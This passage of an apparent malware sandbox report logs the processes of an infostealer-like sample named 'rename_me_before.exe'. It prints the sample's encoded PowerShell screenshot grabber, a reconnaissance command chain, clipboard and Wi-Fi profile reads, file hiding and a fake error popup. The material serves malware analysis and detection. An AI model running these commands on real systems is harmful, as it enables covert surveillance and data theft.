MAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71B8.tmp" "c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Users\user\Desktop\rename_me_before.exe "C:\Users\user\Desktop\rename_me_before.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71B8.tmp" "c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: libffi-8.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: libcrypto-3.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: libssl-3.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
